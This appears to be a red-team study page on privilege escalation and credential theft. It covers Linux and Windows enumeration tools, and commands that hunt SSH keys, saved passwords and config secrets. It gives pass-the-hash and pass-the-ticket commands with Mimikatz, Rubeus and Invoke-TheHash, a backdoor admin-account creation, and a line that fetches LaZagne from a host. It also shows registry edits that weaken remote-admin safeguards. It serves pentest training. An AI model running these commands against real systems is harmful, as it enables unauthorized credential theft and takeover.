Red Team - Fourth step - Privilege Escalation ¶

Privilege Escalation 🔑 is the fourth step of the pentester activities. We attempt to escalate from a regular user to an administrative account by exploiting a vulnerability in the system.

This is an important step otherwise we may not have enough privilege to access data, leave a backdoor, or for most post-exploitation tasks.

We want to access account with the higher level of privileges:

• root > sudoers > [...] on Linux
• NT AUTHORITY\SYSTEM > Administrator > [...] on Windows

Escalation can be horizontally/laterally (another user with the same level of privileges) and vertically (a higher level of privileges).

Learn 🎓

• Ignitetechnologies/Privilege-Escalation (3.0k ⭐, CTFs)

Tools

• Meterpreter (scripts for Linux/Windows)

Each operating system has its own set of escalation vectors while they share similarities. The most common point is that we want to gather information about the environnement.

• User information 🧑: it may be used to determine your level of access, your role, along with username naming conventions

• Host information 💻: it may be used to find if there are well-known vulnerabilities or misconfigurations.

• Network information 🌍: from the outside, we mostly only saw a portion of the internal network. We find find that the host is running a FTP server only available from the inside.

Additionally, look for folders where you can download and run scripts, along with the machine configuration to configure them properly.

I compiled a list of handy commands per operating system:

• Linux Environment Identification
• Windows Environment Identification

You will also have to look for installed tools and apps along with their versions. You will need these to look for CVEs and exploits related to local escalation privilege.

Linux privilege escalation may be achieved by exploiting:

• 💎 Exploiting sudo
• ⏰ Exploiting scheduled tasks (cron tasks)
• 🔑 Finding credentials/files (config, logs, ssh keys...)
• 💥 Exploiting the kernel
• 🐸 Misconfigured file permissions
• 📦 Look for unmounted drives/medias
• 👻 Look for printers (lpstat)

External tools/services

• 🎠 Misconfigured NFS shares
• 🎠 Misconfigured Docker socket/permissions
• 🎠 Misconfigured Tmux sessions

⚠️ Don't forget hidden files. Compiled Recipe.

There are many automated scripts that will investigate usual places, services, files... that you may want to look at. You will still have to understand the output, dig into it...

• linPEAS (13.9k ⭐ | shell script)
• LinEnum (6.4k ⭐ | shell script | 2020 🪦)
• traitor (6.3k ⭐ | go script compiled to binary | 2022 ☠️)
• linux-smart-enumeration a.k.a. LSE (3.0k ⭐ | shell script)
• linuxprivchecker (1.4k ⭐ | python script, 2021 🪦)
• pwncat-cs (2.3k ⭐ | reverse shell with priv. esc. suggester | 2022 ☠️)

Additional references

• GTFOBins
• Injection
• Rootbash
• Restricted Shells

Windows privilege escalation may be achieved by exploiting:

• 💎 Exploiting UAC
• ⏰ Exploiting scheduled tasks
• 🔑 Finding credentials (config, logs, passwords...)
• 💥 Exploiting services
• 🐸 Exploiting privileges

Additional references

• LOLBAS (6.3k ⭐)
• hijacklibs (0.5k ⭐)
• frizb (0.7k ⭐, checklist, 2020 🪦)

There are many automated scripts that will investigate usual places, services, files... that you may want to look at. You will still have to understand the output, dig into it...

• WinPeas (13.9k ⭐ | binary | Download and Run .\winPEASany_ofs.exe)
• wesng (3.8k ⭐ | Work locally from an output file 🙌)
• Seatbelt (3.2k ⭐)
• PrivescCheck (2.4k ⭐ | powershell script)
• JAWS (1.5k ⭐ | 2020 🪦)
• PowerSploit (11.2k ⭐ | powershell script | 2017 🪦 | This is the latest version of PowerTools and PowerUp which are dead too since 2014/2015).

$ wes.py --update         # update local database
$ wes.py [...] output.txt # process the selected tool output
PS> powershell -ep bypass -c ". .\PrivescCheck.ps1; Invoke-PrivescCheck"
PS> powershell -ep bypass -c ". .\PowerUp.ps1; Invoke-AllChecks"

You may try to look for credentials. Try password/key reuse.

• 🔑 Password, Passphrases
• 🎫 Tickets (ex: Kerberos), Tokens (ex: GIT), Keys (ex: SSH)

Common places to dig for credentials are:

• 🔐 command history (ex: ~/.bash_history, *hist*)
• 🌍 browser history and saved passwords
• 🛣️ application and system logs (/var/log/)
• 🐚 backups (.old, .bak, xxx~...)
• ✉️ conversations/mails (/var/mail/)
• 🌳 configurations (.env, .ini/.config/.cfg/.conf/.cnf, .sql)
• 🤖 scripts and tasks (.sh/.ps1/.bat, cronjob)
• 👜 check the registry (Windows, privilege required)
• 💎 Databases (.*db*), Password Managers, Applications, Files
• ...

Manually dig for interesting or unexpected files

• /: look for unexpected folders in /
• /root/: test if administrator home is readable
• ~/Desktop: look for documents, passwords...
• ~/Documents: look for documents, passwords...
• %appdata%: look for sensitive applications data

Always put yourself in the target shoes.

Linux CredHunting Notes ¶

You often find interesting files in easy CTFs using:

$ find / -user $(whoami) -type f 2>/dev/null | grep -v /proc | grep -v /sys
$ find / -type f -writable 2>/dev/null | grep -v /proc | grep -v /sys

Find credentials, keys, tokens, passwords:

$ find / -name .ssh 2> /dev/null
$ find / -name *id_rsa* 2> /dev/null
$ grep -rnw "PRIVATE KEY" / 2>/dev/null | grep ":1" # private keys
$ grep -rnw "ssh-rsa" / 2>/dev/null | grep ":1"     # public keys
$ find / -wholename "*.git/config" 2> /dev/null | xargs grep "url"

🔐 As root, check Linux password history file: /etc/security/opasswd.

Windows CredHunting Notes ¶

Read PowerShell console history:

PS> type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
CMD> type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

List saved credentials by Windows:

PS> cmdkey /list
PS> # use 'admin' saved credentials to start cmd.exe
PS> runas /savecred /user:admin cmd.exe

Some known locations:

# Internet Information Services (IIS) = the default web server
PS> type C:\inetpub\wwwroot\web.config | findstr connectionString
PS> type C:\Windows\Microsoft.NET\Framework64\vX.X.XXXXX\Config\web.config | findstr connectionString
# Windows Deployment Services (credentials of the admin that
# deployed the OS image to several hosts, referred as "Unattended")
PS> type C:\Unattend.xml
PS> type C:\Windows\Panther\Unattend.xml
PS> type C:\Windows\Panther\Unattend\Unattend.xml
PS> type C:\Windows\system32\sysprep.inf
PS> type C:\Windows\system32\sysprep\sysprep.xml
# Putty
PS> reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
# VNC servers
# FileZilla
PS> type C:\xampp\FileZilla Server\FileZilla Server.xml
PS> type C:\Program Files\FileZilla Server\FileZilla Server.xml

Automated Tools To Find Credentials ¶

You can use LaZagne (8.9k ⭐).

PS> wget IP:port/LaZagne.exe -UseBasicParsing -O LaZagne.exe
PS> .\LaZagne.exe all

Pass-the-hash (pth) ¶

There are some scenarios in which we got hold of a hash, but haven't managed to crack it. We may try to use the hash.

Legacy systems using NTLM instead of Kerberos (or alternatives) may be vulnerable as hashes are not salted and may be reused.

• Protocol-specific tools (examples)

$ evil-winrm -i IP -u username -H "hash" # WinRM protocol
$ impacket-psexec -hashes :hash username@IP
$ nxc smb IP/32 -u username -d . -H hash
$ xfreerdp  /v:IP /u:username /pth:hash

⚠️ Remote Local Administrator pth is not possible by default. You need to disable DisableRestrictedAdmin, for instance, using: reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f (registry permission required).

• We can use the popular Mimikatz tool on Windows.

• We can use linikatz (0.5k ⭐) on a Linux target

• We can use the Invoke-TheHash (1.4k ⭐, 2018 🪦) script suite on Windows. We can use it to create a user on the target, if we have admin access onto the target. Otherwise, pop a reverse shell.

PS> Import-Module .\Invoke-TheHash.psd1
PS> Invoke-SMBExec -Target IP -Domain xxx -Username xxx -Hash xxx -Command "net user xxx Password123 /add && net localgroup administrators xxx /add" -Verbose
PS> Invoke-WMIExec -Target DC01 -Domain xxx.xxx -Username xxx -Hash xxx -Command "cmd.exe"

⚠️ We cannot remotely access a local administrator account by default. If FilterAdministratorToken is disabled, you can set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy to 1 to by-pass this check.

Pass-the-ticket (ptt) ¶

Some authentication mechanisms such as Kerberos are based on tickets to authorize access to resources. Given a ticket that hasn't expired, we may be able to access interesting resources.

On Windows, an user can only access their tickets, while an admin can access every ticket on the computer.

• We can use the popular Mimikatz tool on Windows.

mimikatz# sekurlsa::tickets /export # dump tickets
CMD> dir *.kirbi # @krbtgt == TGT
mimikatz# kerberos::ptt ".\xxx@yyy.kirbi" # load ticket

• We can use linikatz (0.5k ⭐) on Linux

• We can use mimipenguin (3.6k ⭐, 2022 🪦) on Linux

• We can use Rubeus (3.7k ⭐) on Windows

PS> .\Rubeus.exe dump /nowrap # Dump tickets
PS> # Load the ticket in the current session
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /ptt
PS> .\Rubeus.exe ptt /ticket:xxx@yyy.kirbi
PS> .\Rubeus.exe ptt /ticket:<the base64 encoded ticket>
PS> # Pass the Key / OverPass the Hash == create a ticket
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /aes256:xxx /nowrap
PS> .\Rubeus.exe asktgt /domain:xxx /user:xxx /rc4:xxx /nowrap

What's next? 🐼 According to the ticket that was loaded, you may be able to run commands that you couldn't before. For instance:

PS> dir \\DC01.xxx.yyy\c$
PS> dir \\DC01.xxx.yyy\some_user_share
PS> dir \\DC01\some_user_share
PS> Enter-PSSession -ComputerName DC01

Courses

• payatu.com
• udemy.com

Random

• WADComs (1k ⭐)/wadcoms website
• Metasploit PRO
• Create custom modules, -m or loadpath to load them, doc
• Test cracked credentials on any user

Exploiting Services

• MySQL user-defined functions
• PrintSpoofer

Training

• allinonemj (LXC)